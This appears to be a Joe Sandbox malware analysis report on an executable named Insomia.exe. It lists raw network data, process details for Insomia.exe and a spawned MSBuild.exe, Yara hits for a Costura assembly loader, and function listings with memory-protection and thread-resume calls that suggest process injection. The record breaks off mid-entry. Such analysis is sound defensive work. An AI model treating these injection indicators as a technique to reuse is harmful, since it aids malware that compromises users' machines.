2025-01-05 18:38:18 UTC	1369	IN	Data Raw: 66 33 77 4b 37 48 43 7a 49 4a 65 6f 6d 46 59 64 4b 47 41 57 78 4d 52 4d 65 6d 72 63 42 73 6b 79 64 63 33 4e 49 2b 39 48 48 75 6f 38 2b 47 30 64 42 6e 4e 77 38 30 32 2f 34 37 2b 49 55 50 63 6c 51 68 7a 64 79 68 6e 78 54 51 5a 6c 62 41 30 67 6e 53 56 74 2f 72 2f 74 6d 6d 76 51 59 6b 42 48 36 63 6f 6d 33 39 71 53 78 42 53 53 62 43 33 74 62 32 53 2f 52 5a 61 39 7a 4e 45 50 74 78 33 76 4c 47 68 70 33 6f 42 6e 63 2b 59 6f 71 41 50 65 47 30 61 33 4a 79 47 4f 72 46 6f 70 55 66 34 6c 74 6a 78 64 4a 62 6a 32 33 6f 72 38 58 41 6d 38 56 70 46 32 41 66 71 36 46 6e 32 70 74 77 48 58 42 44 37 64 53 47 36 6d 2f 44 56 6e 2f 53 39 31 76 53 58 63 4f 4c 36 66 61 46 35 54 73 6b 44 57 61 74 75 57 2b 53 75 6e 41 5a 63 78 4c 50 31 70 33 69 55 74 42 6a 4d 49 58 49 4c 66 6b 64 78 Data Ascii: f3wK7HCzIJeomFYdKGAWxMRMemrcBskydc3NI+9HHuo8+G0dBnNw802/47+IUPclQhzdyhnxTQZlbA0gnSVt/r/tmmvQYkBH6com39qSxBSSbC3tb2S/RZa9zNEPtx3vLGhp3oBnc+YoqAPeG0a3JyGOrFopUf4ltjxdJbj23or8XAm8VpF2Afq6Fn2ptwHXBD7dSG6m/DVn/S91vSXcOL6faF5TskDWatuW+SunAZcxLP1p3iUtBjMIXILfkdx
2025-01-05 18:38:18 UTC	1369	IN	Data Raw: 61 36 69 45 4e 50 6a 36 74 67 55 53 54 6f 33 78 6d 66 52 37 72 35 4a 79 53 45 75 34 2f 62 2f 62 79 4a 50 67 53 77 4c 6a 62 30 4c 33 52 45 78 73 76 41 64 6d 62 5a 38 6d 6c 4e 31 74 77 49 63 57 68 70 50 35 6a 79 57 68 32 35 4f 6b 70 39 6c 58 69 6c 72 76 39 67 73 74 6f 4b 77 77 67 70 36 4e 41 2b 4a 6b 6e 57 33 55 68 74 71 32 6d 36 6c 4c 32 64 55 58 53 30 53 37 58 46 4f 53 55 7a 63 43 31 70 6a 31 74 4b 51 47 48 75 48 6a 39 72 79 6c 76 58 6b 50 6e 37 49 48 67 54 2f 63 37 63 50 62 34 4a 75 55 64 7a 70 58 66 30 49 6a 4c 45 7a 70 74 5a 6f 66 32 66 76 69 4b 46 78 41 50 4e 64 54 53 6f 2b 64 55 6c 6e 74 4f 30 76 30 52 38 57 50 5a 6e 4f 72 44 71 4f 63 64 47 42 30 54 72 66 6c 6d 2f 61 78 79 51 6d 41 7a 35 73 43 4d 34 33 75 4a 53 53 32 4f 2f 46 6a 37 54 2b 75 6f 34 76 Data Ascii: a6iENPj6tgUSTo3xmfR7r5JySEu4/b/byJPgSwLjb0L3RExsvAdmbZ8mlN1twIcWhpP5jyWh25Okp9lXilrv9gstoKwwgp6NA+JknW3Uhtq2m6lL2dUXS0S7XFOSUzcC1pj1tKQGHuHj9rylvXkPn7IHgT/c7cPb4JuUdzpXf0IjLEzptZof2fviKFxAPNdTSo+dUlntO0v0R8WPZnOrDqOcdGB0Trflm/axyQmAz5sCM43uJSS2O/Fj7T+uo4v
2025-01-05 18:38:18 UTC	1369	IN	Data Raw: 4a 58 4d 7a 6c 4c 70 73 36 73 4d 4e 59 67 77 62 30 75 2b 59 34 6d 50 31 59 55 50 69 30 54 44 54 56 65 36 65 74 34 36 68 7a 67 45 77 62 78 6d 4c 6c 57 7a 66 6d 79 5a 38 53 6a 58 4b 72 59 7a 55 61 50 6f 6a 51 50 44 54 44 4e 46 41 2f 65 2f 65 38 70 43 37 42 47 77 71 46 5a 75 54 4a 38 53 5a 4c 55 74 51 53 4f 71 74 68 4d 49 53 2f 47 42 71 35 39 67 46 68 47 6e 6e 34 62 6e 5a 75 4e 6b 34 48 7a 30 62 71 4b 78 78 32 49 45 63 65 51 67 55 7a 50 71 34 78 57 6e 31 58 57 48 69 30 44 6e 49 45 65 4c 71 34 73 32 4d 77 67 74 70 41 52 2b 6d 39 30 7a 2f 76 67 6c 51 61 45 6e 72 2f 72 6e 63 54 75 46 37 61 64 6e 4d 4d 64 52 35 70 59 37 67 39 59 2f 46 48 32 38 37 59 70 53 6b 56 49 53 35 63 30 39 56 48 4c 44 64 6e 65 4e 6d 30 47 42 63 78 71 4d 76 79 52 54 36 72 39 76 6b 72 2b 30 Data Ascii: JXMzlLps6sMNYgwb0u+Y4mP1YUPi0TDTVe6et46hzgEwbxmLlWzfmyZ8SjXKrYzUaPojQPDTDNFA/e/e8pC7BGwqFZuTJ8SZLUtQSOqthMIS/GBq59gFhGnn4bnZuNk4Hz0bqKxx2IEceQgUzPq4xWn1XWHi0DnIEeLq4s2MwgtpAR+m90z/vglQaEnr/rncTuF7adnMMdR5pY7g9Y/FH287YpSkVIS5c09VHLDdneNm0GBcxqMvyRT6r9vkr+0
2025-01-05 18:38:18 UTC	1369	IN	Data Raw: 59 53 34 65 4d 36 77 4a 55 70 69 4e 4c 33 4a 77 4e 78 70 2f 45 68 38 2f 64 63 70 6c 6d 7a 41 37 64 6a 64 72 63 4a 68 43 7a 77 7a 67 76 30 6a 2f 62 67 6d 52 48 49 56 73 38 6e 41 34 48 37 41 50 6d 72 45 2b 56 2b 45 5a 4f 79 68 37 38 4f 62 2f 78 35 70 61 42 58 61 71 47 62 43 75 68 78 65 56 45 44 4b 35 4c 7a 53 51 2f 5a 6a 54 63 62 53 4c 49 70 41 34 35 58 69 39 70 48 46 47 6a 6f 62 4f 49 4f 72 57 75 61 5a 42 58 51 58 4d 36 2f 54 6c 75 6c 67 39 55 63 2f 2b 76 59 38 36 45 6a 68 6a 4c 76 4f 6d 73 41 58 4d 41 45 46 69 36 5a 76 36 4c 38 44 63 55 6f 7a 76 50 2b 64 33 78 62 7a 4f 47 6a 39 71 46 6a 54 5a 4f 75 32 76 64 43 48 75 69 49 4b 4b 41 57 34 67 6b 72 6c 72 53 70 48 53 51 4f 77 6f 4b 65 56 54 75 64 6c 53 76 2f 4d 57 4d 35 78 36 4c 4c 50 34 37 7a 76 43 57 55 30 Data Ascii: YS4eM6wJUpiNL3JwNxp/Eh8/dcplmzA7djdrcJhCzwzgv0j/bgmRHIVs8nA4H7APmrE+V+EZOyh78Ob/x5paBXaqGbCuhxeVEDK5LzSQ/ZjTcbSLIpA45Xi9pHFGjobOIOrWuaZBXQXM6/Tlulg9Uc/+vY86EjhjLvOmsAXMAEFi6Zv6L8DcUozvP+d3xbzOGj9qFjTZOu2vdCHuiIKKAW4gkrlrSpHSQOwoKeVTudlSv/MWM5x6LLP47zvCWU0

Target ID:	0
Start time:	13:37:55
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Insomia.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Insomia.exe"
Imagebase:	0xf70000
File size:	2'786'168 bytes
MD5 hash:	7F3BCF6644FD8551A83CC1F4BF126C4F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2131556246.00000000060D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:38:07
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xaa0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	99.2%
Signature Coverage:	2.4%
Total number of Nodes:	368
Total number of Limit Nodes:	18

Executed Functions

Function 061A0040 Relevance: 16.1, Strings: 12, Instructions: 1099COMMON

Download Yara Rule

Strings

$]q, xrefs: 061A0911
$]q, xrefs: 061A096A
$]q, xrefs: 061A0497
$]q, xrefs: 061A0537
4, xrefs: 061A0A15
$]q, xrefs: 061A0921
$]q, xrefs: 061A0547
$]q, xrefs: 061A097A
$]q, xrefs: 061A0487
,aq, xrefs: 061A0AFA
$]q, xrefs: 061A02C3
$]q, xrefs: 061A02D3

Memory Dump Source

Source File: 00000000.00000002.2131893356.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_Insomia.jbxd

Similarity

API ID:
String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3443518476
Opcode ID: 3d7efb0f8045d83921afc0a322cde06037ce179b5844137b3d390967626f01ba
Instruction ID: af399347cc8e4cbcbb091d943315f7753220c2b88989e0f825094905ba91dede
Opcode Fuzzy Hash: 3d7efb0f8045d83921afc0a322cde06037ce179b5844137b3d390967626f01ba
Instruction Fuzzy Hash: 54B20534A00218CFDB58CFA9C994BADB7B6FF88705F158599E505AB3A5CB70AC81CF50

Function 016D2A2E Relevance: 14.1, Strings: 11, Instructions: 330
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

c, xrefs: 016D29EE
j, xrefs: 016D2A23
d, xrefs: 016D2A09
m, xrefs: 016D2A12
e, xrefs: 016D2A2C
e, xrefs: 016D2A00
Q, xrefs: 016D29E5
4, xrefs: 016D2D66
:, xrefs: 016D2D99
;, xrefs: 016D2DD0
k, xrefs: 016D29F7

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID: 4$:$;$Q$c$d$e$e$j$k$m
API String ID: 0-861153105
Opcode ID: 2532ae3bab49bae16b24100575d5c7816a7c1065d7f0f114f4b87aba5afd9347
Instruction ID: d9c04422bbb7f1f7f93bb6415f5a9f28822f8d9ff060cf80f69e550ffeed207d
Opcode Fuzzy Hash: 2532ae3bab49bae16b24100575d5c7816a7c1065d7f0f114f4b87aba5afd9347
Instruction Fuzzy Hash: 97E19C70D05249CFDB21CFAADC603AEBAB1FF09315F05426ED516AB291CB754A82CF52

Function 05E92DE4 Relevance: 9.4, Strings: 6, Instructions: 1933
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 05E92FF7
7%e(, xrefs: 05E94A59
$]q, xrefs: 05E92FA0
g=, xrefs: 05E9427F
TJbq, xrefs: 05E92EF2
_, xrefs: 05E94B9D

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: 7%e($TJbq$_$$]q$$]q$g=
API String ID: 0-187468217
Opcode ID: 0f423921521d0a4f79f4a133c0c22dbb4f5b87fbc991e8946a0a26c25125ca11
Instruction ID: e02c9b33557eb91cfe91eef3b645c64c9108a0abbea2440b8ad871fa838ea7c9
Opcode Fuzzy Hash: 0f423921521d0a4f79f4a133c0c22dbb4f5b87fbc991e8946a0a26c25125ca11
Instruction Fuzzy Hash: 5913E47A600114EFDB0A8F94DD48D96BBB6FF8C314B0680D4E2099B276CB36D961EF54

Function 061A0367 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$]q, xrefs: 061A0911
$]q, xrefs: 061A096A
$]q, xrefs: 061A0537
4, xrefs: 061A0A15
,aq, xrefs: 061A0AFA
$]q, xrefs: 061A0487

Memory Dump Source

Source File: 00000000.00000002.2131893356.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_Insomia.jbxd

Similarity

API ID:
String ID: ,aq$4$$]q$$]q$$]q$$]q
API String ID: 0-324474496
Opcode ID: 710a2f9ff1dc94b4074aaf98ab12ea8169d32619d52646cd61fa0917ca80df4f
Instruction ID: 5757dee1f2c55e7f294cf229b675fdb22c943ba4447d0b77b6d47c1a9935a67f
Opcode Fuzzy Hash: 710a2f9ff1dc94b4074aaf98ab12ea8169d32619d52646cd61fa0917ca80df4f
Instruction Fuzzy Hash: 0422FA34A00219CFDB64CF65C994BADB7B2FF88309F158199D509AB3A5DB70AD81CF50

Function 016DC950 Relevance: 6.0, Strings: 4, Instructions: 956
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJbq, xrefs: 016DCAF2
paq, xrefs: 016DD50A
Te]q, xrefs: 016DD073
xb`q, xrefs: 016DCA7D

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID: TJbq$Te]q$paq$xb`q
API String ID: 0-4160082283
Opcode ID: 01a206e1ae3661a15a2bf0258fe4be1802b6943748840ae3c27426750e9bf303
Instruction ID: abd12b47be4104ec86db3a91b53f1bdcba7d0248a2cbcb35c4554e3dafe6345a
Opcode Fuzzy Hash: 01a206e1ae3661a15a2bf0258fe4be1802b6943748840ae3c27426750e9bf303
Instruction Fuzzy Hash: CCA2A275E00228CFDB65CF69CD84A99BBB2BF89304F1581E9D509AB365DB319E81CF40

Function 05EE0040 Relevance: 3.8, Strings: 2, Instructions: 1335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 05EE06A2
2, xrefs: 05EE101E

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID: 2$$]q
API String ID: 0-351713980
Opcode ID: fa8bbec9e76b14fa89dcc78238f8ab4ad8cbe8fcefb0648e108c35cddf853da5
Instruction ID: adcc535fecc55dad1d67222c39a762144e77d98056b0e31e7f677de71037554f
Opcode Fuzzy Hash: fa8bbec9e76b14fa89dcc78238f8ab4ad8cbe8fcefb0648e108c35cddf853da5
Instruction Fuzzy Hash: DBE2CF74A052288FCB65DF68D984ADABBF6FF88301F1081E9D409A7354DB349E85CF91

Function 061BAE08 Relevance: 3.1, Strings: 2, Instructions: 607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fbq, xrefs: 061BAF0F
8, xrefs: 061BAEFC

Memory Dump Source

Source File: 00000000.00000002.2131941319.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61b0000_Insomia.jbxd

Similarity

API ID:
String ID: fbq$8
API String ID: 0-3186246319
Opcode ID: 4ee755a2856ce9272278b5a722d2da17444bf4f324adfeec9912ef143edcad51
Instruction ID: e6da350300108efb27c8331cecf4041e8dc00e554ac5eb3be638af27e43ccb2a
Opcode Fuzzy Hash: 4ee755a2856ce9272278b5a722d2da17444bf4f324adfeec9912ef143edcad51
Instruction Fuzzy Hash: 4D52D875E01229CFDB64DF68C854AD9B7B2FF89310F5086AAD509A7354DB30AE81CF90

Function 05E9C5C8 Relevance: 2.8, Strings: 2, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 05E9C19D
Te]q, xrefs: 05E9C168

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 78e475701629213b393961a5eee1a40a265f3b14dae4c7122d82434d5a6b7970
Instruction ID: 35dd016d22cf784aef2e0c19b034037a6bbdaa76f1d0fd808d953682ba070d95
Opcode Fuzzy Hash: 78e475701629213b393961a5eee1a40a265f3b14dae4c7122d82434d5a6b7970
Instruction Fuzzy Hash: 82F1C274E05219CFDB68EFA9D884BADB7B2FB89304F6090AAD44DA7254DB345D81CF40

Function 061BADA9 Relevance: 2.7, Strings: 2, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h, xrefs: 061BAEF0
fbq, xrefs: 061BAF0F

Memory Dump Source

Source File: 00000000.00000002.2131941319.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61b0000_Insomia.jbxd

Similarity

API ID:
String ID: fbq$h
API String ID: 0-3598783323
Opcode ID: b54a28d1871a31a70af7626750abddc314298d9e0f8d17139f0be70e4983e09f
Instruction ID: b8ff006f61966ab529e02118276bd80e900bdbf8d4769cab16a0a8108d51a52d
Opcode Fuzzy Hash: b54a28d1871a31a70af7626750abddc314298d9e0f8d17139f0be70e4983e09f
Instruction Fuzzy Hash: 22813571D052688FEB65DF69C854BD9BBB2FF89300F1082EAC449A7261DB345A85CF90

Function 016D8CA8 Relevance: 2.7, Strings: 2, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 016D8D9A
4']q, xrefs: 016D8D6F

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: b1d5d93a625cba3e10e04c3ffc5a9282a63c4ca05d131a41361d22cb09aacb78
Instruction ID: 1cf11ae81caf7611a164378fbf4f1bc9cf60424d64c0b857384dbf83784ba735
Opcode Fuzzy Hash: b1d5d93a625cba3e10e04c3ffc5a9282a63c4ca05d131a41361d22cb09aacb78
Instruction Fuzzy Hash: 88711771A142098FDB09DF7AE941A9EBFF3FF88300F54C52AD009AB265DB745806DB91

Function 016D8CB8 Relevance: 2.7, Strings: 2, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 016D8D9A
4']q, xrefs: 016D8D6F

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 0a671bbf527fa58825b337e1f43fa6de9c2c17d8c48136aec7939849d9d0ebf2
Instruction ID: e2c9ee51fbdf951b4d6ce6a834cb3f776daad82ccd4a382cf91b5b70c12fb276
Opcode Fuzzy Hash: 0a671bbf527fa58825b337e1f43fa6de9c2c17d8c48136aec7939849d9d0ebf2
Instruction Fuzzy Hash: C4711671A142098FD709DF7AE941A9EBFF3FF88300F54C52AD009AB265EB745806DB90

Function 061BE149 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 061BE205

Memory Dump Source

Source File: 00000000.00000002.2131941319.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61b0000_Insomia.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 86712c2e735640459532c912ff04a7ddd876b3501b5b7bbde66bb3247f7cf991
Instruction ID: 1be742fd431dad1ab3e377810a70c8c01274eb85c4a996c6d0e2ea322d9833c4
Opcode Fuzzy Hash: 86712c2e735640459532c912ff04a7ddd876b3501b5b7bbde66bb3247f7cf991
Instruction Fuzzy Hash: 2B41AAB8D002589FCF10CFAAD980ADEFBB5BF49310F10A42AE819B7210C735A945CF64

Function 061BE150 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 061BE205

Memory Dump Source

Source File: 00000000.00000002.2131941319.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61b0000_Insomia.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 447cac1777401950c8d4a378993747a463f884e500beaae9440f7cdd6f1ed133
Instruction ID: bc24bc587745db806169266d69e9fa70c4a5eeeedfe6362d1462cb983d9aef94
Opcode Fuzzy Hash: 447cac1777401950c8d4a378993747a463f884e500beaae9440f7cdd6f1ed133
Instruction Fuzzy Hash: B54179B8D002599FCF10CFAAD984ADEFBB5BF49310F10A42AE819B7210D735A945CF64

Function 016D5120 Relevance: 1.6, Strings: 1, Instructions: 338COMMON

Download Yara Rule

Strings

TJbq, xrefs: 016D5350

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID: TJbq
API String ID: 0-1760495472
Opcode ID: 69edca28705a40f9444710c38e45388bf27a46bcb753ec19d9d314f286599837
Instruction ID: 6bf6a34ed47d3d634a4a744d37e31918c06627fa023a1dcbd5d0a2a38a30a0fd
Opcode Fuzzy Hash: 69edca28705a40f9444710c38e45388bf27a46bcb753ec19d9d314f286599837
Instruction Fuzzy Hash: 20D14B30E05205CFDB15DFA8CC50AAABBB1FB49301F15846AD416EBBA1DB35DC46CB91

Function 06210A09 Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06210A9E

Memory Dump Source

Source File: 00000000.00000002.2132081413.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_Insomia.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1fd43760ab365d555ad402287eb7835e2833706dc228be76fa37aab6a7ee39cf
Instruction ID: 84ba41161d68089944a8470cebeedba77a156319d9526351175bfdef741645a9
Opcode Fuzzy Hash: 1fd43760ab365d555ad402287eb7835e2833706dc228be76fa37aab6a7ee39cf
Instruction Fuzzy Hash: FE31CBB4D152589FCB10CFAAD984A9EFBF5BF59310F20842AE909B7200C774A945CF94

Function 06210A10 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06210A9E

Memory Dump Source

Source File: 00000000.00000002.2132081413.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_Insomia.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3fcdf497b0e44b20057ea7338a4e25c757a0476f01d0c75e8759adccf4deb454
Instruction ID: 6c2bb8d84df1013627b224011b48b19e529a990c4f98f7f664cd7a62e7b73aa9
Opcode Fuzzy Hash: 3fcdf497b0e44b20057ea7338a4e25c757a0476f01d0c75e8759adccf4deb454
Instruction Fuzzy Hash: 8831AAB4D012189FCB10CFAAD984A9EFBF5FF59310F20942AE919B7200C775A945CF94

Function 05EF53E0 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

PH]q, xrefs: 05EF576E

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 527aedce44d04052b1f92eab067bdcdaf7d2ad5289e181d7c2cea832b7cab941
Instruction ID: 7549ff14115dbe44bd4718797abc8cfd7875f271b4daaccd8a8d4fb84dcf5892
Opcode Fuzzy Hash: 527aedce44d04052b1f92eab067bdcdaf7d2ad5289e181d7c2cea832b7cab941
Instruction Fuzzy Hash: 3CD10574E05218CFDB24CFA9D884BEDBBF2FB59304F20A06AD54AA7245EB345985CF41

Function 05EF53CF Relevance: 1.5, Strings: 1, Instructions: 293COMMON

Download Yara Rule

Strings

PH]q, xrefs: 05EF576E

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 84b672ab02b5fe40e5b1b4b817e2ce29324b3fb012eb98dcfab100aac1034aa8
Instruction ID: 69a49dbde30e56194c5bdbd5388af71ea5f01390f3a001c803daff27d2a05fc0
Opcode Fuzzy Hash: 84b672ab02b5fe40e5b1b4b817e2ce29324b3fb012eb98dcfab100aac1034aa8
Instruction Fuzzy Hash: 45C12574E05218CFDB24CFA9D884BEEBBF2FB99304F20A06AD549A7245DB345985CF41

Function 016DF188 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Ddq, xrefs: 016DF28D

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID: Ddq
API String ID: 0-562783569
Opcode ID: f474494906c9118e9bb329b0e5a3cecead4057cf5404ccb9715d661defead999
Instruction ID: 2bb0535a0c6b6931f98988d2f194bc6fe2dfde1b95fc0b7d955b6798f9908cce
Opcode Fuzzy Hash: f474494906c9118e9bb329b0e5a3cecead4057cf5404ccb9715d661defead999
Instruction Fuzzy Hash: 66D1C274E00218CFDB54DFA9D990A9DBBB2FF89300F5081A9D40AAB365DB359D82CF51

Function 05E99888 Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

Te]q, xrefs: 05E99A92

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 4350b861cf314d9494d8717d38b12e83ccb70181fc7f7b7a700f9e229fc055ce
Instruction ID: 05d50156c216fb9f5b20d76e938e130598076fb2986f9108566fdaed2fb62e09
Opcode Fuzzy Hash: 4350b861cf314d9494d8717d38b12e83ccb70181fc7f7b7a700f9e229fc055ce
Instruction Fuzzy Hash: 47B1C370E05218CFDB28DFA9D984BEDBBB2FB89304F20A069D449E7256E7745985CF40

Function 05E99878 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

Te]q, xrefs: 05E99A92

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 16f3b9ef5d0fd0644a5e76d5bdb342595f43a2a83675e9dc547fd6d85fbb084d
Instruction ID: 385a5f30bbdb96bdf3e232da803d68a0263252dd6d284170f112a6bba712daec
Opcode Fuzzy Hash: 16f3b9ef5d0fd0644a5e76d5bdb342595f43a2a83675e9dc547fd6d85fbb084d
Instruction Fuzzy Hash: 97B1B270E05218CFDB28DFA9D984BEDBBB2FB88304F20A069D449E7256E7745985CF40

Function 060C9B41 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

u1, xrefs: 060C9D39

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: u1
API String ID: 0-655931248
Opcode ID: d6bf42b06c61ee9e76b614b7db597e732e7fef0cc23b85fec7a27fd92cd98cc8
Instruction ID: eba4e12c9c76917918069f2c2a527d7fe71338a4c2cb3db45beb1a9d615839a8
Opcode Fuzzy Hash: d6bf42b06c61ee9e76b614b7db597e732e7fef0cc23b85fec7a27fd92cd98cc8
